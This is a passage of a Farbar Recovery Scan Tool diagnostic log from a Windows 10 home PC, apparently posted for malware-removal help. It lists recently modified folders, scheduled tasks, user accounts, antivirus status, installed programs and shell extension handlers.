17:50 - 000000000 ____D C:\WINDOWS\system32\OpenSSH 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ___RD C:\WINDOWS\PrintDialog 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\SystemResources 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\setup 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\oobe 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\Dism 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\Provisioning 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\DiagTrack 2021-05-06 12:16 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\bcastdvr 2021-05-06 12:14 - 2019-12-07 17:03 - 000000000 ____D C:\WINDOWS\CbsTemp 2021-05-06 12:13 - 2019-12-07 17:52 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\OEMDefaultAssociations.dll 2021-05-06 11:45 - 2020-11-11 21:31 - 000004170 _____ C:\WINDOWS\system32\Tasks\User_Feed_Synchronization-{BC7AF1B8-2D77-4206-A075-B9FC5A37F7AE} 2021-05-05 12:23 - 2020-12-28 20:55 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information 2021-05-05 08:24 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\NDF 2021-05-04 18:04 - 2020-10-01 12:14 - 000000000 ____D C:\Program Files (x86)\USB Disk Security 2021-05-04 17:36 - 2019-12-07 17:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP 2021-05-03 21:54 - 2021-01-28 15:26 - 000000000 ____D C:\Users\FRANCIS\Documents\MATLAB 2021-05-03 20:12 - 2020-12-20 15:43 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\LenovoServiceBridge 2021-05-03 20:02 - 2020-11-16 20:09 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\CrashDumps 2021-05-03 08:56 - 2021-02-05 09:52 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\Spotify 2021-05-03 08:55 - 2021-02-05 09:37 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Spotify 2021-05-02 21:07 - 2020-10-01 12:04 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\BitTorrent 2021-05-02 16:43 - 2021-02-24 12:59 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\BitTorrentHelper 2021-05-01 10:09 - 2020-09-29 18:20 - 000002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk 2021-05-01 10:09 - 2020-09-29 18:20 - 000002283 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk 2021-05-01 10:09 - 2020-09-29 18:20 - 000002283 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk 2021-04-29 08:52 - 2020-09-30 20:15 - 000003382 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3936790745-3440936247-791344644-1001 2021-04-29 08:51 - 2020-09-30 18:58 - 000002376 _____ C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2021-04-28 15:36 - 2020-09-30 09:21 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\ElevatedDiagnostics 2021-04-28 13:17 - 2020-09-29 11:05 - 000000124 _____ C:\WINDOWS\win.ini 2021-04-27 08:12 - 2021-01-26 11:16 - 000000582 _____ C:\WINDOWS\Tasks\MATLAB R2019b Startup Accelerator.job 2021-04-26 17:39 - 2021-01-26 11:16 - 000003252 _____ C:\WINDOWS\system32\Tasks\MATLAB R2019b Startup Accelerator 2021-04-26 17:39 - 2021-01-20 20:37 - 000003152 _____ C:\WINDOWS\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:37 - 000002914 _____ C:\WINDOWS\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000003398 _____ C:\WINDOWS\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000003196 _____ C:\WINDOWS\system32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002984 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002948 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2021-01-20 20:36 - 000002744 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2021-04-26 17:39 - 2020-11-17 18:19 - 000002858 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3936790745-3440936247-791344644-1002 2021-04-26 17:39 - 2020-10-07 18:29 - 000003482 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task 2021-04-26 17:39 - 2020-09-30 20:15 - 000003408 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2021-04-26 17:39 - 2020-09-30 20:15 - 000003184 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2021-04-26 15:34 - 2020-03-31 17:20 - 000000000 ____D C:\Users\FRANCIS\Downloads\ZIP 2021-04-25 14:12 - 2019-10-31 17:56 - 000000000 ____D C:\Users\FRANCIS\Downloads\The Sims 4 [anadius Repack] 2021-04-25 12:09 - 2020-10-01 11:43 - 000001051 _____ C:\Users\Public\Desktop\WinRAR.lnk 2021-04-25 12:09 - 2020-10-01 11:43 - 000001051 _____ C:\ProgramData\Desktop\WinRAR.lnk 2021-04-25 12:09 - 2020-10-01 11:43 - 000000000 ____D C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2021-04-25 12:09 - 2020-10-01 11:43 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2021-04-25 12:09 - 2020-10-01 11:42 - 000000000 ____D C:\Program Files\WinRAR 2021-04-24 21:59 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2021-04-24 14:27 - 2020-10-07 18:28 - 000002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk 2021-04-22 11:57 - 2021-02-22 13:51 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\et-EE 2021-04-16 20:09 - 2019-12-07 17:14 - 000000000 ____D C:\WINDOWS\system32\es-MX 2021-04-16 13:24 - 2020-09-30 19:39 - 002877440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2021-04-15 12:00 - 2021-01-20 20:37 - 000001450 _____ C:\Users\Public\Desktop\GeForce Experience.lnk 2021-04-15 12:00 - 2021-01-20 20:37 - 000001450 _____ C:\ProgramData\Desktop\GeForce Experience.lnk 2021-04-15 12:00 - 2020-09-28 20:13 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2021-04-15 11:59 - 2020-09-28 20:13 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2021-04-15 11:59 - 2020-09-28 20:13 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2021-04-14 14:25 - 2020-09-29 10:54 - 000000000 ____D C:\WINDOWS\system32\MRT 2021-04-14 14:20 - 2020-09-29 10:53 - 131963968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2021-04-13 20:40 - 2020-10-01 19:00 - 000000000 ____D C:\Users\FRANCIS\Desktop\The Sims Collection 2021-04-13 11:42 - 2020-11-14 20:38 - 000000000 ____D C:\ProgramData\Package Cache 2021-04-12 18:09 - 2020-09-30 18:58 - 000000000 ____D C:\Users\FRANCIS 2021-04-11 14:52 - 2020-09-29 19:44 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\D3DSCache 2021-04-11 09:04 - 2020-09-28 21:07 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd 2021-04-10 20:56 - 2021-03-30 16:24 - 000000000 ____D C:\ProgramData\Mozilla 2021-04-10 18:05 - 2020-10-03 17:56 - 000000000 ____D C:\Users\PC Gamer Jones\AppData\Roaming\Adobe 2021-04-10 17:19 - 2021-02-26 18:05 - 000000000 ____D C:\Users\FRANCIS\Downloads\Adobe Master Collection 2021 RUS-ENG v3 - [CrackzSoft] 2021-04-08 15:12 - 2019-12-07 17:14 - 000000000 ____D C:\Program Files\Common Files\microsoft shared 2021-04-07 19:38 - 2021-01-20 20:37 - 002817904 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll 2021-04-07 19:38 - 2021-01-20 20:37 - 002171760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll 2021-04-07 19:38 - 2021-01-20 20:37 - 001293680 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvRtmpStreamer64.dll 2021-04-07 10:21 - 2021-04-04 12:00 - 000000000 ____D C:\Users\FRANCIS\Downloads\sims-4-updater-0.5.4 2021-04-07 09:59 - 2020-10-01 18:25 - 000000000 ____D C:\Users\FRANCIS\AppData\Local\SquirrelTemp ==================== Files in the root of some directories ======== 2021-04-28 09:18 - 2021-04-28 13:22 - 000000049 _____ () C:\Users\FRANCIS\AppData\Roaming\MCVi2UserDetail.ini 2020-11-17 18:19 - 2020-11-17 18:19 - 000000000 _____ () C:\Users\FRANCIS\AppData\Local\oobelibMkey.log ==================== SigCheck ============================ (There is no automatic fix for files that do not pass verification.) ==================== End of FRST.txt ======================== Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-04-2021 Ran by FRANCIS (07-05-2021 11:07:42) Running from C:\Users\FRANCIS\Downloads Windows 10 Home Single Language Version 20H2 19042.964 (X64) (2020-09-30 12:18:12) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-3936790745-3440936247-791344644-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-3936790745-3440936247-791344644-503 - Limited - Disabled) FRANCIS (S-1-5-21-3936790745-3440936247-791344644-1001 - Administrator - Enabled) => C:\Users\FRANCIS Guest (S-1-5-21-3936790745-3440936247-791344644-501 - Limited - Disabled) PC Gamer Jones (S-1-5-21-3936790745-3440936247-791344644-1002 - Limited - Enabled) => C:\Users\PC Gamer Jones WDAGUtilityAccount (S-1-5-21-3936790745-3440936247-791344644-504 - Limited - Disabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: McAfee VirusScan (Enabled - Up to date) {9D4501E6-72F6-2877-C789-89AF6F535B2C} AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} FW: McAfee Firewall (Enabled) {A57E80C3-3899-292F-ECD6-209A91801C57} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 21.001.20150 - Adobe Systems Incorporated) Adobe Genuine Service (HKLM-x32\...\AdobeGenuineService) (Version: - Adobe) Anaconda3 2020.11 (Python 3.8.5 64-bit) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Anaconda3 2020.11 (Python 3.8.5 64-bit)) (Version: 2020.11 - Anaconda, Inc.) BitTorrent (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\BitTorrent) (Version: 7.10.5.45967 - BitTorrent Inc.) BitTorrent (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\BitTorrent) (Version: 7.10.5.45785 - BitTorrent Inc.) CLUE - Accusations and Alibis (HKLM-x32\...\{952DD7C5-99FB-40A3-9CBF-2F0A46985D2B}) (Version: 1.0 - LeeGTs Games) CLUE Classic (HKLM-x32\...\CLUE Classic_is1) (Version: - ) Discord (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Discord) (Version: 0.0.309 - Discord Inc.) Dolby Audio X2 Windows API SDK (HKLM\...\{82C288CC-A96D-43E3-9119-944DABF5DD61}) (Version: 0.8.0.74 - Dolby Laboratories, Inc.) Dolby Audio X2 Windows APP (HKLM\...\{9207D68E-666A-49C7-A900-9F5B2FF289E4}) (Version: 0.8.0.71 - Dolby Laboratories, Inc.) Excel (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel) Excel (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel) Graphics Rules Maker (HKLM-x32\...\Graphics Rules Maker) (Version: 1.1.0 - SimsNetwork.com) HitmanPro 3.8 (HKLM\...\HitmanPro38) (Version: 3.8.10.298 - SurfRight B.V.) Intel® C++ Redistributables on Intel® 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation) Lenovo Service Bridge (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1) (Version: 5.0.2.2 - Lenovo) Lenovo System Update (HKLM-x32\...\TVSU_is1) (Version: 5.07.0118 - Lenovo) Malwarebytes version 4.3.3.116 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.3.3.116 - Malwarebytes) MATLAB R2019b (HKLM\...\Matlab R2019b) (Version: 9.7 - MathWorks) McAfee® Total Protection (HKLM-x32\...\MSC) (Version: 16.0 R31 - McAfee, LLC) Microsoft 365 Apps for enterprise - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.13929.20296 - Microsoft Corporation) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 90.0.818.51 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\OneDriveSetup.exe) (Version: 21.073.0411.0002 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\OneDriveSetup.exe) (Version: 19.043.0304.0013 - Microsoft Corporation) Microsoft Teams (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Teams) (Version: 1.3.00.28779 - Microsoft Corporation) Microsoft Teams (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Teams) (Version: 1.3.00.26064 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{A0E1B43D-5F4A-46AF-9925-ABA3423325DC}) (Version: 2.77.0.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29913 (HKLM-x32\...\{855e31d2-9031-46e1-b06d-c9d7777deefb}) (Version: 14.28.29913.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29913 (HKLM-x32\...\{03d1453c-7d5c-479c-afea-8482f406e036}) (Version: 14.28.29913.0 - Microsoft Corporation) Microsoft Visual Studio Code (User) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.56.0 - Microsoft Corporation) Node.js (HKLM\...\{C6D70F34-C254-4D55-B4A0-55F921939297}) (Version: 15.14.0 - Node.js Foundation) NVIDIA FrameView SDK 1.1.4923.29781331 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.1.4923.29781331 - NVIDIA Corporation) NVIDIA GeForce Experience 3.22.0.32 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.22.0.32 - NVIDIA Corporation) Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.13929.20296 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.13929.20296 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.13929.20216 - Microsoft Corporation) Hidden Outlook (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\6b0f23e57a39ebfbf2814acb1a24293d) (Version: 1.0 - Outlook) Outlook (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\6b0f23e57a39ebfbf2814acb1a24293d) (Version: 1.0 - Outlook) PowerPoint (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\319814cb56b667dff88f54e08be8f51f) (Version: 1.0 - PowerPoint) Python 3.9.4 (64-bit) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{e300c142-10a9-46f4-a195-bd40cb90a84f}) (Version: 3.9.4150.0 - Python Software Foundation) Python 3.9.4 Add to Path (64-bit) (HKLM\...\{D5076D33-101B-4402-AAC0-001C6D74D9AB}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Core Interpreter (64-bit) (HKLM\...\{DE09AD3C-F617-4EAF-B4F5-943473CB00DA}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Development Libraries (64-bit) (HKLM\...\{CCD8CD39-7BDE-46B9-9222-336226D0C346}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Documentation (64-bit) (HKLM\...\{C625291F-C4B5-45A7-B946-FFAB8535A64A}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Executables (64-bit) (HKLM\...\{A8C63C1D-BCF8-4446-AFAA-AE21DDA1DBEF}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 pip Bootstrap (64-bit) (HKLM\...\{2E65BC05-C532-4BD6-ACDD-3CFDE86F5E36}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Standard Library (64-bit) (HKLM\...\{D8D430E7-0DCE-418C-A937-735F329C1AD8}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Tcl/Tk Support (64-bit) (HKLM\...\{E4228F0E-C40C-403A-9533-29BA5A9F9E99}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Test Suite (64-bit) (HKLM\...\{86FD19A0-F018-465C-B8C9-02EA01D35A4B}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Utility Scripts (64-bit) (HKLM\...\{0C0FBC09-C0AA-4B66-92BF-E321BC8C9FA5}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python Launcher (HKLM-x32\...\{12B4CAFF-F2FA-422B-B30C-2265217D8CF8}) (Version: 3.9.7398.0 - Python Software Foundation) s3pe - Sims3 Package Editor (HKLM-x32\...\s3pe) (Version: 14-0222-1852 - Peter L Jones) SlimDX Runtime .NET 4.0 x86 (January 2012) (HKLM-x32\...\{7EBD0E43-6AC0-4CA8-9990-00E50069AD29}) (Version: 2.0.13.43 - SlimDX Group) Spotify (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Spotify) (Version: 1.1.54.592.gc0b20638 - Spotify AB) Teams Machine-Wide Installer (HKLM-x32\...\{731F6BAA-A986-45A4-8936-7C3AAAAA760B}) (Version: 1.4.0.4167 - Microsoft Corporation) The Sims 2: Ultimate Collection (HKLM-x32\...\{04450C18-F039-4B81-A621-70C3B0F523D5}) (Version: 1.0.0.1 - Electronic Arts) The Sims™ 3 [anadius Repack] (HKLM-x32\...\The Sims™ 3_is1) (Version: 1.67.2.024037 - ) TSR Workshop (HKLM-x32\...\{F68B3749-D483-47E6-9BB8-097906F9D471}) (Version: 2.2.92 - The Sims Resource) USB Disk Security (HKLM-x32\...\USB Disk Security_is1) (Version: - Zbshareware Lab) Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1-2) (Version: 1.0.65.1 - LunarG, Inc.) Hidden WebAdvisor by McAfee (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.1.586 - McAfee, LLC) WinRAR 6.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.01.0 - win.rar GmbH) Word (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word) Word (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word) Zoom (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\ZoomUMX) (Version: 5.4.9 (59931.0110) - Zoom Video Communications, Inc.) Zoom (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\ZoomUMX) (Version: 5.0 - Zoom Video Communications, Inc.) Packages: ========= Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.4213.0_x64__8wekyb3d8bbwe [2021-04-28] (Microsoft Studios) [MS Ad] NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.960.0_x64__56jybvy8sckqj [2021-01-20] (NVIDIA Corp.) Photos Add-on -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2021.39122.10110.0_x64__8wekyb3d8bbwe [2021-03-12] (Microsoft Corporation) Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-11-07] (Microsoft Corporation) PowerPoint -> C:\Program Files\WindowsApps\powerpoint.office.com-8D456796_1.0.0.3_neutral__sxc7ffma4ybfy [2021-05-07] (powerpoint.office.com) ==================== Custom CLSID (Whitelisted): ============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-3936790745-3440936247-791344644-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\FRANCIS\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3936790745-3440936247-791344644-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\FRANCIS\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-06] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxDTCM.dll [2018-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-06-19] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-06] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers6: [McCtxMenuFrmWrk] -> 